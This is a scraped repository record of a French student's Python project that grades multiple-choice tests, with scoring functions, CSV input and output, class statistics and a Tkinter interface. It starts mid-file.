Canevas2.grid(column=2,row=3,padx=20, pady=20)\r\n return\r\n\r\ndef VoirStatistiques():\r\n \"\"\" Cette fonction permet de connaitre la moyenne et l'écart type des notes du questionnaire \"\"\"\r\n Detruire()\r\n Canevas.delete(ALL)\r\n Canevas2.delete(ALL)\r\n moyenne=0#J'initialise mes deux variable à zéro\r\n ecarttype=0\r\n corriger=corrigeGrille(lireCSV(),lireSolutionCSV())\r\n listeNotesEleves=noteGrille(corriger)#Je fais la même chose que dans ecritureCSV pour avoir une grille de notes et prénoms \r\n longueur1=len(listeNotesEleves)#Je crée une variable longueur pour ne par avoir à écrire len(listeNotesEleves)\r\n for i in range(longueur1):#Je parcours ma liste\r\n moyenne+=listeNotesEleves[i][1]#J'ajoute la note des élèves à \"moyenne\" pour avoir le total des notes\r\n moyenne/=longueur1#Je divise ce total des notes stocké dans \"moyenne\" par \"longueur\" pour obtenir la moyenne\r\n for i in range(longueur1):#Je parcours ma liste\r\n ecarttype+=((listeNotesEleves[i][1]-moyenne)*(listeNotesEleves[i][1]-moyenne))#J'applique la formule de la variance qui est (x-moyenne)^2 divisée par longueur1 soit grand N\r\n ecarttype/=longueur1\r\n ecarttype=math.sqrt(ecarttype)#Pour trouver l'écart type j'utilise la fonction sqrt de math soit racine carrée sur la variance\r\n\r\n Canevas.config(height=fen.winfo_height()/2,width=fen.winfo_width())\r\n\r\n Canevas2.config(height=fen.winfo_height()/2,width=fen.winfo_width())\r\n\r\n Canevas.grid(row=1,column=1,padx=10, pady=2)\r\n Canevas.create_text(fen.winfo_width()/3,fen.winfo_height()/4,text='La moyenne de la classe est de '+str(\"{:.2f}\".format(moyenne)), font=('System',30))#J'utilise format pour n'afficher que deux chiffres après la virgule\r\n Canevas2.grid(row=2,column=1,padx=10, pady=2)\r\n Canevas2.create_text(fen.winfo_width()/3,fen.winfo_height()/4,text='L\\'écart type de la classe est de '+str(\"{:.2f}\".format(ecarttype)), font=('System',30))\r\n \r\n return\r\n\r\ndef VoirGraphiqueBaton():\r\n \"\"\" Cette fonction permet d'afficher un graphique en baton des notes du questionnaire\"\"\"\r\n Detruire()\r\n Canevas.delete(ALL)\r\n corriger=corrigeGrille(lireCSV(),lireSolutionCSV())#Je fais la même chose que dans ecritureCSV pour avoir une grille de notes et prénoms \r\n listeNotesEleves=noteGrille(corriger)\r\n listeNotesEleves.sort(key=op.itemgetter(1))#Je trie selon l'ordre croissant des notes\r\n longueur1=len(listeNotesEleves)\r\n listeNotes1=[]#J'initialise 2 listes vides, la première me servira à avoir toutes les différentes notes qu'ont eut les élèves, la deuxième me servira à compter le nombre d'élèves pour chacune de ces notes\r\n listeNombre=[]\r\n x=0#J'initialise 1 variable, l'index, à zéro\r\n listeNotes1.append(listeNotesEleves[0][1])#J'initialise la liste des notes par la valeur la plus basse(1ère de la liste car triée par ordre croissant) \r\n listeNombre.append(1)#J'initialise le compteur du nombre d'élèves à un\r\n for i in range(longueur1):#Je parcours ma liste\r\n if listeNotes1[x]!=listeNotesEleves[i][1]:# Si la note d'un élève n'est plus égale à la note stockée dans listeNotes1 alors\r\n listeNotes1.append(listeNotesEleves[i][1])#je rajoute cette note à listeNotes1\r\n listeNombre.append(1)#Je réinitialise le compteur du nombre d'élèves à un pour chacune des notes\r\n x+=1#en incrémentant l'index\r\n else:\r\n listeNombre[x]+=1#Sinon j'incrémente le compteur du nombre d'élèves de un pour cette note\r\n Canevas.create_line(325,fen.winfo_height()-50,325,(fen.winfo_height()-50)-max(listeNombre)*1.5, fill='black')#Je crée les axes de légende\r\n for i in range(len(listeNombre)):#Je parcours la liste de nombres d'élèves ayant eu une note\r\n Canevas.create_rectangle((i*20)+325,fen.winfo_height()-50,((i+1)*20)+325,(fen.winfo_height()-50)-listeNombre[i]*1.5, outline='black')#Je crée les rectangles du diagramme en batons\r\n Canevas.create_text((i*20)+333,fen.winfo_height()-15, text= str(listeNotes1[i]))#J'écris les légendes horizontales\r\n Canevas.create_text(310,(fen.winfo_height()-50)-listeNombre[i]*1.5, text=str(listeNombre[i]),font=('Helvetica',5))#J'écris les légendes verticales\r\n Canevas.config(height=fen.winfo_height(), width=fen.winfo_width())\r\n Canevas.grid(row=1,column=0,padx=20)\r\n return\r\n\r\ndef VoirPourcentages():\r\n \"\"\" Cette fonction permet d'afficher l'accueil pour les pourcentages \"\"\"\r\n Detruire()\r\n\r\n Canevas.delete(ALL)\r\n Canevas2.delete(ALL)\r\n Canevas3.delete(ALL)\r\n\r\n Entree2.config(font=('System',15))\r\n Bouton3.config(font=('System',15))\r\n \r\n Entree2.grid(column=0, row=1, padx=10, pady=10)\r\n Bouton3.grid(column=1, row=1,padx=10, pady=10)\r\n return\r\n\r\n\r\ndef VoirPourcentage():\r\n \"\"\"Cette fonction permet de calculer les pourcentages d'élève, en dessous, au dessus et égale à une note\"\"\"\r\n nombre=0\r\n nombre2=0\r\n nombre3=0#J'initialise mes trois variables, qui vont contenir le nombre de notes au dessus, dessous et égale à la note recherchée, à zéro\r\n\r\n pourcentage1=0#J'initialise mes trois variables qui vont contenir les pourcentages à zéro \r\n pourcentage2=0\r\n pourcentage3=0\r\n \r\n Canevas.delete(ALL)\r\n Canevas2.delete(ALL)\r\n Canevas3.delete(ALL)#J'efface le contenu des Canevas\r\n corriger=corrigeGrille(lireCSV(),lireSolutionCSV())\r\n longueur=noteGrille(corriger)#Je fais la même chose que dans ecritureCSV pour avoir une grille de notes et prénoms \r\n if recherche2.get().isdigit()==False:# Si la saisie n'est pas un nombre alors je la compte comme une recherche fausse\r\n pourcentage2=100\r\n pourcentage1=0\r\n else:#Sinon je parcours ma grille\r\n for i in range(len(longueur)):\r\n if int(longueur[i][1])>int(recherche2.get()):# Si ma note est supérieure à celle recherchée alors j'incrémente nombre\r\n nombre=nombre+1\r\n elif int(longueur[i][1])<int(recherche2.get()):# Si ma note est inférieure à celle recherchée alors j'incrémente nombre2\r\n nombre2=nombre2+1\r\n elif int(longueur[i][1])==int(recherche2.get()):# Si ma note est égale à celle recherchée alors j'incrémente nombre3\r\n nombre3=nombre3+1\r\n pourcentage1=(nombre/len(longueur))*100# Je calcule les pourcentages en fonction des nombres\r\n pourcentage2=(nombre2/len(longueur))*100\r\n pourcentage3=(nombre3/len(longueur))*100\r\n\r\n if (pourcentage2==100 and pourcentage1==0)or(pourcentage2==0 and pourcentage1==100):# Si un des poucentages est égal à 100% tandis que celui opposée est égal à 0% alors cela veut dire que la note demandée n'est soit qu'inférieur ou supérieur à une note possible, la rendant inexistante \r\n Canevas.config(width=fen.winfo_width(), height=fen.winfo_height()/2)\r\n Canevas3.grid_forget()\r\n Canevas2.grid_forget()\r\n Canevas.create_text(fen.winfo_width()/4+35,fen.winfo_height()/4,text=\"Cette note n'est pas comprise dans l'intervalle des notes\", font=('System',20) )\r\n Canevas.grid(column=2, row=1 ,columnspan=4,padx=20, pady=0)\r\n else:#Sinon j'affiche les trois pourcentages arrondi au deuxième chiffre après la virgule avec format\r\n Canevas.config(width=fen.winfo_width()/2, height=fen.winfo_height()/3)\r\n Canevas2.config(width=fen.winfo_width()/2, height=fen.winfo_height()/3)\r\n Canevas3.config(width=fen.winfo_width()/2, height=fen.winfo_height()/3)\r\n\r\n Canevas.create_text(fen.winfo_width()/4,fen.winfo_height()/8,text=\"Le pourcentage d'élèves ayant une note supérieure à la note rentrée est de \"+str(\"{:.2f}\".format(pourcentage1))+\"%\",font=('System', '16'))\r\n\r\n Canevas2.create_text(fen.winfo_width()/4,fen.winfo_height()/8,text=\"Le pourcentage d'élèves ayant une note inférieure à la note rentrée est de \"+str(\"{:.2f}\".format(pourcentage2))+\"%\",font=('System', '16'))\r\n\r\n Canevas3.create_text(fen.winfo_width()/4,fen.winfo_height()/8,text=\"Le pourcentage d'élèves ayant une note égale à la note rentrée est de \"+str(\"{:.2f}\".format(pourcentage3))+\"%\",font=('System', '16'))\r\n\r\n Canevas.grid(column=2, row=1 ,columnspan=4,padx=20, pady=0)\r\n Canevas2.grid(column=2, row=2,columnspan=4,padx=20, pady=0)\r\n Canevas3.grid(column=2, row=3,columnspan=4,padx=20, pady=0)\r\n return\r\n\r\ndef Detruire():\r\n \"\"\" Cette fonction efface les wigets de la fenetre pour eviter d'avoir un widget en trop lors d'un affichage \"\"\"\r\n #J'oublie la position des widgets pour les faire disparaitre de la fenetre grace à grid_forget()\r\n Entree.grid_forget()\r\n Bouton.grid_forget()\r\n Entree2.grid_forget()\r\n Bouton2.grid_forget()\r\n Canevas.grid_forget()\r\n BarreDefil.grid_forget()\r\n Canevas2.grid_forget()\r\n BarreDefil2.grid_forget()\r\n Bouton3.grid_forget()\r\n Canevas3.grid_forget()\r\n BarreDefil3.grid_forget()\r\n Label1.grid_forget()\r\n Label2.grid_forget()\r\n Label3.grid_forget()\r\n return\r\n\r\ndef modeNuit():\r\n \"\"\" Cette fonction permet de changer la fenetre pour la passer dans un mode nuit \"\"\" \r\n fen.config(bg='black')#Je configure tout pour que sa soit dans une couleur foncée\r\n\r\n Canevas.config(background='grey', relief='raised')\r\n Canevas2.config(background='grey',relief='raised')\r\n Canevas3.config(background='grey',relief='raised')\r\n\r\n Label1.config(bg='grey')\r\n Label2.config(bg='grey')\r\n Label3.config(bg='grey')\r\n\r\n Bouton.config(bg='grey', activebackground='grey')\r\n Bouton2.config(bg='grey', activebackground='grey')\r\n Bouton3.config(bg='grey', activebackground='grey')\r\n \r\n Entree.config(bg='grey')\r\n Entree2.config(bg='grey') \r\n #Je n'ai pas put changer les barres de défilement et le menu, en effet windows ne le permet que si on fait une classe et je n'ai pas voulu faire trop compliqué\r\n return\r\ndef modeJour():\r\n \"\"\" Cette fonction permet de changer la fenetre pour la passer dans un mode jour \"\"\" \r\n fen.config(bg='white')#Je configure tout pour que cela soit dans une couleur claire\r\n \r\n Canevas.config(background='#E4E4E4')\r\n Canevas2.config(background='#E4E4E4')\r\n Canevas3.config(background='#E4E4E4')\r\n\r\n Label1.config(bg='#E4E4E4')\r\n Label2.config(bg='#E4E4E4')\r\n Label3.config(bg='#E4E4E4')\r\n\r\n Bouton.config(bg='white', activebackground='white')\r\n Bouton2.config(bg='white', activebackground='white')\r\n Bouton3.config(bg='white', activebackground='white')\r\n \r\n Entree.config(bg='white', bd=5, relief='groove')\r\n Entree2.config(bg='white', bd=5, relief='groove')\r\n return\r\n \r\ndef mode(event):\r\n \"\"\" Cette fonction permet de changer entre mode nuit et mode jour \"\"\"\r\n global Mode#Je définis mode en global\r\n if Mode==True:#Si mode est sur jour alors j'execute modeNuit et je mets mode sur nuit \r\n modeNuit()\r\n Mode=False\r\n else:#Sinon l'inverse\r\n modeJour()\r\n Mode=True\r\n return\r\n\r\n \r\nfen=Tk()#Je définis ma fenetre Tkinter\r\n\r\nMode=True#Je définis le mode sur jour\r\n\r\nrecherche=StringVar()#Je définis les variables des entrées\r\n\r\nrecherche2=StringVar()\r\n\r\nLabel1=Label(fen)#Je définis les étiquettes\r\n\r\nLabel2=Label(fen)\r\n\r\nLabel3=Label(fen)\r\n\r\nCanevas=Canvas(fen)#Je définis les Canevas\r\n\r\nCanevas2=Canvas(fen)\r\n\r\nCanevas3=Canvas(fen)\r\n\r\nEntree=Entry(fen,textvar=recherche)#Je définis les entrées et les boutons\r\n\r\nBouton=Button(fen,text='Rechercher la note de cet.te élève', command=rechercher)\r\n\r\nEntree2=Entry(fen,textvar=recherche2)\r\n\r\nBouton2=Button(fen,text='Rechercher les élèves à partir de la note', command=rechercher2)\r\n\r\nBouton3=Button(fen,text='Rechercher le pourcentages d\\'élèves à partir de la note', command=VoirPourcentage)\r\n\r\nBarreDefil=Scrollbar(fen)#Je définis les barre de défilement\r\n\r\nBarreDefil2=Scrollbar(fen)\r\n\r\nBarreDefil3=Scrollbar(fen)\r\n\r\nMenuBarre=Menu(fen)#Je définis le menu principale\r\n\r\nfen.state('zoomed')#Je définis l'état plein écran de la fenetre au départ\r\n\r\nfen.configure(cursor='left_ptr', bd='5', menu=MenuBarre)#J'associe MenuBarre à la fenetre en temps que menu\r\n\r\nsousMenu=Menu(MenuBarre)#Je definis les sous menus\r\nsousMenu2=Menu(MenuBarre)\r\nsousMenu3=Menu(MenuBarre)\r\n\r\nMenuBarre.add_cascade(label=\"Accueil\", command=Accueil)#Je definis un choix Accueil associé à la commande du même nom\r\nMenuBarre.add_cascade(label=\"Notes des élèves\", menu=sousMenu)#Je définis des choix avec des sous menu en cascade\r\nMenuBarre.add_cascade(label=\"Réponses des élèves\", menu=sousMenu2)\r\nMenuBarre.add_cascade(label=\"Statistiques\", menu=sousMenu3)\r\nMenuBarre.add_cascade(label=\"Quitter\", command=fen.destroy)#Je définis un choix Quitter qui détruit la fenetre\r\n\r\nsousMenu.add_command(label='Voir les notes des élèves', command=VoirNotesEleves)#J'ajoute à chaque sous menu des choix avec des commandes associées avec les fonctions vues plus haut\r\nsousMenu.add_command(label='Voir l\\'élève ayant la meilleur note', command=EleveMeilleur)\r\nsousMenu.add_command(label='Voir l\\'élève ayant la pire note', command=ElevePire)\r\nsousMenu.add_command(label='Charger les notes des élèves dans un fichier', command=ecritureCSV)\r\n\r\nsousMenu2.add_command(label='Voir les réponses des élèves', command=VoirReponsesEleves)\r\nsousMenu2.add_command(label='Voir les réponses fausses des élèves', command=VoirReponsesFausses)\r\nsousMenu2.add_command(label='Voir les réponses du moins au plus réussi', command=VoirReponsesOrdreReusite)\r\nsousMenu2.add_command(label='Voir la solution des réponses', command=VoirSolution)\r\n\r\nsousMenu3.add_command(label='Voir les statistiques', command=VoirStatistiques)\r\nsousMenu3.add_command(label='Voir les différents pourcentages d\\'élèves', command=VoirPourcentages)\r\nsousMenu3.add_command(label='Voir le graphique en bâtons', command=VoirGraphiqueBaton)\r\n\r\nfen.title('Gestion QCM')#Je choisis le titre de ma fenetre\r\n\r\nAccueil()#Je définis que la page sur laquelle commencera l'utillisateur sera Accueil\r\nmodeJour()#Je définis que l'on commence en mode Jour\r\n\r\nfen.bind('<space>',mode)# J'associe la touche espace à mode\r\n\r\nfen.mainloop()#Je mets en boucle ma fenetre\r\n\r\n\r\n\r\n\r\n" }, { "alpha_fraction": 0.5793558359146118, "alphanum_fraction": 0.595265805721283, "avg_line_length": 33.503448486328125, "blob_id": "10832c420c2f0ee4e57977a9723c8758818ca3c2", "content_id": "d2c486a8356bba8aec3891a493941b89bbcf4e8a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5179, "license_type": "no_license", "max_line_length": 117, "num_lines": 145, "path": "/Correcteur QCM - Copie/projetCorrecteur.py", "repo_name": "Latrazil/projetCorrecteurQCM", "src_encoding": "UTF-8", "text": "lAlan = ['Alan','A','D','Z','C','C','B','Z','D']\r\nlsolution = ['solution','A','A','C','C','C','B','C','D']\r\ndef points(reponse,solution):\r\n if reponse==solution:\r\n return 3\r\n elif reponse!=solution:\r\n if reponse=='Z':\r\n return 0\r\n else:\r\n return -1\r\n \r\n\r\ndef corrige (lrep,lsol):\r\n \"\"\" decrire votre fonction ici \"\"\"\r\n # en tout premier je crée une liste vide dans laquelle je vais mettre ma réponse\r\n resultat = []\r\n # ensuite j'y ajoute mon prenom\r\n resultat.append(lrep[0])\r\n for i in range(1,len(lrep)): # je parcours le reste de ma liste et je pense à \r\n reponse = lrep[i]\r\n solution = lsol[i]\r\n score = points(reponse,solution)\r\n resultat.append(score)\r\n return resultat\r\n\r\nl=['Alan',3,-1,0,3,3,3,0,3]\r\ndef note (lpoints):\r\n somme=0\r\n for i in range(1,len(lpoints)):\r\n somme+=lpoints[i]\r\n return somme\r\n\r\ndef reponseFausse(lpoints):\r\n rf=[]\r\n rf.append(lpoints[0])\r\n for i in range(1,len(lpoints)):\r\n if lpoints[i]!=3:\r\n rf.append(i)\r\n \"\"\" decrire votre fonction ici \"\"\"\r\n return rf # pour l'instant votre fonction ne fait rien. Ligne à supprimer quand vous écrivez votre fonction\r\n\r\n\r\n# partie 2\r\n\r\ngrille = [ ['Alan','A','D','Z','C','C','B','Z','D'] ,\r\n ['Ada','B','D','B','C','Z','B','Z','A'] ,\r\n ['Hedy','B','D','B','C','Z','B','Z','Z'] ]\r\nlsolution = ['solution','A','A','C','C','C','B','C','D']\r\n\r\ndef corrigeGrille(grillerep,lsol):\r\n grille2=[0]*len(grillerep)\r\n \"\"\" decrire votre fonction ici \"\"\"\r\n for i in range(len(grillerep)):\r\n grille2[i]=corrige(grillerep[i],lsol)\r\n return grille2# pour l'instant votre fonction ne fait rien. Ligne à supprimer quand vous écrivez votre fonction\r\n\r\ng= [ ['Alan', 3,-1,0,3,3,3,0,3] ,\r\n ['Ada', -1,-1,-1,3,0,3,0,-1] ,\r\n ['Hedy', -1,-1,-1,3,0,3,0,0] ]\r\n\r\ndef noteGrille(grillepoints):\r\n \"\"\" decrire votre fonction ici \"\"\"\r\n grille3=[0]*len(grillepoints)\r\n for x in range(len(grillepoints)):\r\n grille3[x]=[0]*2\r\n for i in range(len(grillepoints)):\r\n for j in range(len(grillepoints[i])):\r\n if j==0:\r\n grille3[i][0]=grillepoints[i][j]\r\n else:\r\n grille3[i][1]=note(grillepoints[i])\r\n return grille3 # pour l'instant votre fonction ne fait rien. Ligne à supprimer quand vous écrivez votre fonction\r\n\r\ndef reponseFausseGrille (grillepoints):\r\n grille4=[0]*len(grillepoints)\r\n for i in range(len(grillepoints)):\r\n grille4[i]=reponseFausse(grillepoints[i])\r\n \"\"\" decrire votre fonction ici \"\"\"\r\n return grille4 # pour l'instant votre fonction ne fait rien. Ligne à supprimer quand vous écrivez votre fonction\r\n\r\ndef somGrille(grillepoints):\r\n listeSom=[]\r\n listeSom.append('somme')\r\n sommeGrille=0\r\n i=0\r\n j=1\r\n while j <len(grillepoints[i]):\r\n while i <len(grillepoints):\r\n sommeGrille+=grillepoints[i][j]\r\n i=i+1\r\n i=0\r\n listeSom.append(sommeGrille)\r\n sommeGrille=0\r\n j=j+1\r\n \r\n \"\"\" decrire votre fonction ici \"\"\"\r\n return listeSom # pour l'instant votre fonction ne fait rien. Ligne à supprimer quand vous écrivez votre fonction\r\n\r\ngrilleNote = [ ['Alan', 14] , ['Ada', 2] , ['Hedy', 3] ]\r\n\r\ndef meilleurResultat(grillerep) :\r\n mr=''\r\n mrc=0\r\n for i in range(len(grillerep)):\r\n if mrc<grillerep[i][1]:\r\n mrc=grillerep[i][1]\r\n mr=grillerep[i][0] \r\n return mr # pour l'instant votre fonction ne fait rien. Ligne à supprimer quand vous écrivez votre fonction\r\n\r\n# partie 3 fichier\r\n# Pensez à mettre reponse.csv et réponseQCM.csv dans le même répertoire que votre programme.\r\nimport csv\r\ndef lireSolutionCSV():\r\n sol=[]\r\n monFichierSol=open('solution.csv')\r\n contenu=csv.reader(monFichierSol, delimiter=\";\")\r\n for ligne in contenu:\r\n sol.append(ligne)\r\n sol2 = [elt for lst in sol for elt in lst] \r\n \"\"\" decrire votre fonction ici \"\"\"\r\n monFichierSol.close()\r\n return sol2 # pour l'instant votre fonction ne fait rien. Ligne à supprimer quand vous écrivez votre fonction\r\n\r\ndef lireCSV() :\r\n rep=[]\r\n monFichierRep=open('reponseQCM.csv')\r\n contenu=csv.reader(monFichierRep, delimiter=\";\")\r\n for lignes in contenu:\r\n rep.append(lignes)\r\n monFichierRep.close()\r\n \"\"\" decrire votre fonction ici \"\"\"\r\n return rep # pour l'instant votre fonction ne fait rien. Ligne à supprimer quand vous écrivez votre fonction\r\n\r\ndef ecritureCSV():\r\n corriger=corrigeGrille(lireCSV(),lireSolutionCSV())\r\n notePrenom=noteGrille(corriger)\r\n monFichierNote=open('noteQCM.csv',\"w\")\r\n for i in range(len(notePrenom)):\r\n monFichierNote.write(str(notePrenom[i][0]))\r\n monFichierNote.write(';')\r\n monFichierNote.write(str(notePrenom[i][1]))\r\n monFichierNote.write('\\n')\r\n monFichierNote.close()\r\n \"\"\" decrire votre fonction ici \"\"\"\r\n return # pour l'instant votre fonction ne fait rien. Ligne à supprimer quand vous écrivez votre fonction\r\n \r\n" }, { "alpha_fraction": 0.6697247624397278, "alphanum_fraction": 0.6790021657943726, "avg_line_length": 64.90345001220703, "blob_id": "b3304d5b75963e82cd44f86d9aa72f7de7536a85", "content_id": "88619c1f71d5d2fbdb8d652993f3e49559c2dce7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9876, "license_type": "no_license", "max_line_length": 246, "num_lines": 145, "path": "/Correcteur QCM - Copie/projetCorrecteur_basique.py", "repo_name": "Latrazil/projetCorrecteurQCM", "src_encoding": "UTF-8", "text": "lAlan = ['Alan','A','D','Z','C','C','B','Z','D']\r\nlsolution = ['solution','A','A','C','C','C','B','C','D']\r\ndef points(reponse,solution):\r\n \"\"\" Cette fonction permet d'atribuer les points aux élèves en fonction de leurs réponses \"\"\"\r\n if reponse==solution:#Je regarde si la solution est égale à la réponse de l'élève(réponse exacte), si oui je retourne 3\r\n return 3\r\n elif reponse!=solution:\r\n if reponse=='Z':#sinon je demande si la reponse est égale à Z(absence de réponse), si oui je retourne 0\r\n return 0\r\n else:# sinon, si la réponse est fausse, je retourne -1\r\n return -1\r\n \r\n\r\ndef corrige (lrep,lsol):\r\n \"\"\" Cette fonction retourne une liste avec les points des élèves et leurs prénoms \"\"\"\r\n # en tout premier je crée une liste vide dans laquelle je vais mettre mon résultat\r\n resultat = []\r\n # ensuite j'y ajoute le prénom de l'élève\r\n resultat.append(lrep[0])\r\n for i in range(1,len(lrep)): # je parcours le reste de ma liste\r\n reponse = lrep[i]#J'attribue l'élément à la position i à l'intérieur de ma liste de reponses de l'élève à une variable reponse\r\n solution = lsol[i]#J'attribue l'élément à la position i à l'intérieur de ma liste de solution à une variable solution\r\n score = points(reponse,solution)#J'attribue ce que retourne la fonction points à une variable score que j'insers ensuite à résultat\r\n resultat.append(score)\r\n return resultat# Je retourne résultat\r\n\r\nl=['Alan',3,-1,0,3,3,3,0,3]\r\ndef note (lpoints):\r\n \"\"\" Cette fonction renvoie la note totale à l'aide des points \"\"\"\r\n somme=0#J'initialise une variable somme à zéro qui sera ma note\r\n for i in range(1,len(lpoints)):# Je parcours ma liste en excluant le prénom\r\n somme+=lpoints[i]#J'additionne à somme les points à l'index i de ma liste de points\r\n return somme#Je retourne somme soit la note\r\n\r\ndef reponseFausse(lpoints):\r\n \"\"\" Cette fonction retourne la liste des index des réponses fausses \"\"\"\r\n rf=[]#J'initialise une liste vide nommée rf pour Réponses Fausses\r\n rf.append(lpoints[0])#J'y ajoute le prénom de l'élève\r\n for i in range(1,len(lpoints)):#Je parcours le reste de la liste de points\r\n if lpoints[i]!=3:#Si le point à l'index i n'est pas égale à 3, une bonne réponse, alors on ajoute l'index i à la liste rf\r\n rf.append(i)\r\n return rf # Je retourne la liste des réponses fausses\r\n\r\n\r\n# partie 2\r\n\r\ngrille = [ ['Alan','A','D','Z','C','C','B','Z','D'] ,\r\n ['Ada','B','D','B','C','Z','B','Z','A'] ,\r\n ['Hedy','B','D','B','C','Z','B','Z','Z'] ]\r\nlsolution = ['solution','A','A','C','C','C','B','C','D']\r\n\r\ndef corrigeGrille(grillerep,lsol):\r\n \"\"\" Cette fonction corrige une grille(au lieu d'une liste seule)et retourne une grille corrigée avec les points attribués pour chaque élève \"\"\"\r\n grille2=[0]*len(grillerep)#J'initialise une liste de la longueur de la grille de réponses\r\n for i in range(len(grillerep)):#Je parcours ma liste\r\n grille2[i]=corrige(grillerep[i],lsol)#J'assigne à l'index de la liste une nouvelle liste pour en faire une grille\r\n #faite à partir de la fonction corrige(à partir de l'index de la grille de réponses, soit la liste de réponse de l'élève,\r\n #et de la liste de solutions) qui retourne la liste des points marqués par question\r\n return grille2# Je retourne la deuxième grille\r\n\r\ng= [ ['Alan', 3,-1,0,3,3,3,0,3] ,\r\n ['Ada', -1,-1,-1,3,0,3,0,-1] ,\r\n ['Hedy', -1,-1,-1,3,0,3,0,0] ]\r\n\r\ndef noteGrille(grillepoints):\r\n \"\"\" Cette fonction additionne une liste à l'intérieur d'une grille de points pour retourner une grille avec la note par élève \"\"\"\r\n grille3=[0]*len(grillepoints)#Je crée une liste de la taille de la grille de points\r\n for x in range(len(grillepoints)):#Je parcours ma liste\r\n grille3[x]=[0]*2#J'insère une liste de deux occurences pour créer une grille\r\n for i in range(len(grillepoints)):#Je parcours ma grille\r\n for j in range(len(grillepoints[i])):\r\n if j==0:#Je mets le prénom en début de grille3[i] car grillepoints[i][0], grillepoints[i][j] dans cette situation, est l'emplacement du prénom de l'élève \r\n grille3[i][0]=grillepoints[i][j]\r\n else:#Je mets la note en deuxième position, note que je calcule avec la fonction note appliquée à la liste grillepoints[i]\r\n grille3[i][1]=note(grillepoints[i])\r\n return grille3 # Je retourne grille 3 soit la grille avec le prénom et la note des élèves\r\n\r\ndef reponseFausseGrille (grillepoints):\r\n \"\"\" Cette fonction renvoie une grille avec les réponses fausses des élèves \"\"\"\r\n grille4=[0]*len(grillepoints)#Je crée une liste de la taille de la grille de points\r\n for i in range(len(grillepoints)):#Je parcours ma liste\r\n grille4[i]=reponseFausse(grillepoints[i])#J'assigne à l'index de la deuxième liste une nouvelle liste pour en faire une grille\r\n #faite à partir de la fonction reponseFausse de l'index de la grille de points\r\n #qui retourne la liste des index de réponses fausses des élèves\r\n return grille4 # Je retourne grille4 soit la grille avec le prénom de l'élève et l'index de ses réponses fausses\r\n\r\ndef somGrille(grillepoints):\r\n \"\"\" Cette fonction additionne le total des points des élèves pour chacune des questions \"\"\"\r\n listeSom=[]#Je crée une liste vide qui contiendra le total des points des élèves\r\n listeSom.append('somme')#J'ajoute somme au début de la liste\r\n sommeGrille=0#J'initialise une variable à zéro\r\n for j in range(1,len(grillepoints[0])):#Je parcours la liste dans la grille, pour traiter la question j, en excluant le prénom et j'utilise la longueur de grillepoints[0] car les listes ont toutes la même longueur\r\n for i in range(len(grillepoints)):#Je parcours ensuite la grille pour lire les points de chaque élève pour cette question\r\n sommeGrille+=grillepoints[i][j]#J'additionne à la variable les points de la question\r\n listeSom.append(sommeGrille)#J'insere mon ajout(sommeGrille) dans la liste que j'avais initialisée au début\r\n sommeGrille=0#Je remets la variable à zéro pour traiter la question suivante \r\n return listeSom # Je retourne la liste\r\n\r\ngrilleNote = [ ['Alan', 14] , ['Ada', 2] , ['Hedy', 3] ]\r\n\r\ndef meilleurResultat(grillerep) :\r\n \"\"\" Cette fonction donne le nom de l'élève avec le meilleur résultat \"\"\"\r\n mr=grillerep[0][0]# J'initialise avec le nom du premier élève\r\n mrc=grillerep[0][1]#J'initialise à la note du premier élève\r\n for i in range(1,len(grillerep)):#Je parcours ma grille pour chaque élève excluant le premier\r\n if mrc<grillerep[i][1]:# Si la variable mrc(meilleur résultat chiffre) est inférieure à la note de cet.te élève alors :\r\n mrc=grillerep[i][1]#Je remplace la variable mrc avec la note\r\n mr=grillerep[i][0]# Et je remplace le nom de l'élève ayant eu le meilleur résultat \r\n return mr # A la fin je retourne le nom de l'élève ayant eu la meilleure note\r\n\r\n# partie 3 fichier\r\n# Pensez à mettre reponse.csv et réponseQCM.csv dans le même répertoire que votre programme.\r\nimport csv\r\ndef lireSolutionCSV():\r\n \"\"\" Cette fonction lit le fichier solution et renvoie une liste avec la solution \"\"\"\r\n sol=[]#Je déclare une variable sol qui contiendra la solution des réponses\r\n monFichierSol=open('solution.csv')#J'ouvre mon fichier\r\n contenu=csv.reader(monFichierSol, delimiter=\";\")#Je place le contenu du fichier que je lis dans une variable\r\n for ligne in contenu:#Je parcours le contenu\r\n sol=ligne#Je j'ajoute la l'ensemble des solutions dans sol\r\n monFichierSol.close()#Je ferme mon fichier\r\n return sol # Je retourne une liste avec la solution\r\n\r\ndef lireCSV() :\r\n \"\"\" Cette fonction lit les réponses puis renvoie une grille avec le prénom et les réponses qui se trouvaient dans le fichier \"\"\"\r\n rep=[]#Je déclare une variable rep qui contiendra les réponses des éléves\r\n monFichierRep=open('reponseQCM.csv')#J'ouvre mon fichier\r\n contenu=csv.reader(monFichierRep, delimiter=\";\")#Je place le contenu du fichier que je lis dans une variable\r\n for lignes in contenu:#Je parcours le contenu\r\n rep.append(lignes)#Je j'ajoute toutes les lignes dans rep\r\n monFichierRep.close()#Je ferme mon fichier\r\n return rep # Je retourne le contenu du fichier\r\n\r\ndef ecritureCSV():\r\n \"\"\" Cette fonction écrit dans le fichier noteQCM le prénom et la note de l'élève et retourne la liste avec le prénom et la note de l'élève \"\"\"\r\n corriger=corrigeGrille(lireCSV(),lireSolutionCSV())#J'attribue à la variable \"corriger\" la grille résultant de la fonction corrigeGrille, utilisée sur les données renvoyées par les fonctions lireCSV et lireSolutionCSV, soit une grille corigée\r\n notePrenom=noteGrille(corriger)#Je note ensuite cette grille avec la fonction noteGrille qui me renvoie une grille avec le prénom et la note de chaque élève\r\n monFichierNote=open('noteQCM.csv',\"w\")#J'ouvre en mode écriture mon fichier noteQCM\r\n for i in range(len(notePrenom)):#Je parcours ma liste et j'écris le prénom et la note, séparés d'un point virgule et ensuite j'écris un saut de ligne. \r\n monFichierNote.write(str(notePrenom[i][0]))\r\n monFichierNote.write(';')\r\n monFichierNote.write(str(notePrenom[i][1]))\r\n monFichierNote.write('\\n')\r\n monFichierNote.close()#Je ferme mon fichier\r\n return notePrenom# Je retourne la liste des notes\r\n" } ]
3
amaslak0v/scripts
https://github.com/amaslak0v/scripts
1db51825b33d508d3b6204490763a19248eef932
a51c9e47aea576a05ad518f5a25f0c83dcc84aba
48baf40dd12a3b144db29fd20a38889b6d48495e
refs/heads/master
2020-04-23T22:05:35.098363
2019-10-10T14:10:47
2019-10-10T14:10:47
null
0
0
null
null
null
null
null
